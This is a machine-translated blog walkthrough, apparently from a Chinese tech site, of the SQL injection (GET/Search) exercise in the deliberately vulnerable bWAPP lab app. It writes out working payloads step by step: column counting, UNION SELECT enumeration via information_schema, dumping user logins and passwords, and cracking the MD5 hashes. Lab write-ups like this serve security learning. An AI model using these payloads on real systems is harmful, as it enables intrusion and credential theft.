当前位置:网站首页>SQL Injection (GET/Search)
SQL Injection (GET/Search)
2022-07-03 13:37:00 【this is hhhhp】
1. Determine the injection point
Input ' Tips : near '%'' at line 1
1111' or 1=1 #
No abnormality
2. Determine the number of fields
' order by 10 #
' order by 7 #
7 A field
3. Determine the displayable fields :
-1' union select 1,2,3,4,5,6,7 #
2,3,4,5 Is a displayable field
4. Blast storage :
-1' union select 1,database(),3,4,5,6,7 #
Library name :bWAPP
5. Explosion meter :
-1' union select 1,table_name,3,4,5,6,7 from information_schema.tables where table_schema=database()#
altogether 5 A watch , Obviously we need to use users
6. Pop field name
-1' union select 1,column_name,3,4,5,6,7 from information_schema.columns where table_schema=database() and table_name='users'#
altogether 9 A field , We need to login,admin,password
7. Pop field content
-1' union select 1,login,password,4,admin,6,7 from bWAPP.users#
Two in all
8.md5 Decrypt md5 Online decryption ,md5 Decryption encryption
A.I.M. bug
bee bug
边栏推荐
- 挡不住了,国产芯片再度突进,部分环节已进到4nm
- SwiftUI 开发经验之作为一名程序员需要掌握的五个最有力的原则
- Asp.Net Core1.1版本没了project.json,这样来生成跨平台包
- json序列化时案例总结
- Multi table query of MySQL - multi table relationship and related exercises
- Ubuntu 14.04 下开启PHP错误提示
- Convolution emotion analysis task4
- Brief analysis of tensorboard visual processing cases
- CVPR 2022 | interpretation of 6 excellent papers selected by meituan technical team
- Box layout of Kivy tutorial BoxLayout arranges sub items in vertical or horizontal boxes (tutorial includes source code)
猜你喜欢
使用Tensorflow进行完整的深度神经网络CNN训练完成图片识别案例2
Flink SQL knows why (19): the transformation between table and datastream (with source code)
Tutoriel PowerPoint, comment enregistrer une présentation sous forme de vidéo dans Powerpoint?
Flink SQL knows why (XIV): the way to optimize the performance of dimension table join (Part 1) with source code
Students who do not understand the code can also send their own token, which is easy to learn BSC
Logseq 评测:优点、缺点、评价、学习教程
18W word Flink SQL God Road manual, born in the sky
AI 考高数得分 81,网友:AI 模型也免不了“内卷”!
Flink SQL knows why (XV): changed the source code and realized a batch lookup join (with source code attached)
[sort] bucket sort
随机推荐
Task5: multi type emotion analysis
AI scores 81 in high scores. Netizens: AI model can't avoid "internal examination"!
Flink SQL knows why (19): the transformation between table and datastream (with source code)
Spark实战1:单节点本地模式搭建Spark运行环境
服务器硬盘冷迁移后网卡无法启动问题
Start signing up CCF C ³- [email protected] chianxin: Perspective of Russian Ukrainian cyber war - Security confrontation and sanctions g
Unity Render Streaming通过Js与Unity自定义通讯
【历史上的今天】7 月 3 日:人体工程学标准法案;消费电子领域先驱诞生;育碧发布 Uplay
静态链表(数组的下标代替指针)
The principle of human voice transformer
Father and basketball
php 迷宫游戏
Resource Cost Optimization Practice of R & D team
json序列化时案例总结
Flink code is written like this. It's strange that the window can be triggered (bad programming habits)
Flink SQL knows why (XIV): the way to optimize the performance of dimension table join (Part 1) with source code
道路建设问题
HALCON联合C#检测表面缺陷——HALCON例程autobahn
CVPR 2022 | 美团技术团队精选6篇优秀论文解读
MySQL constraints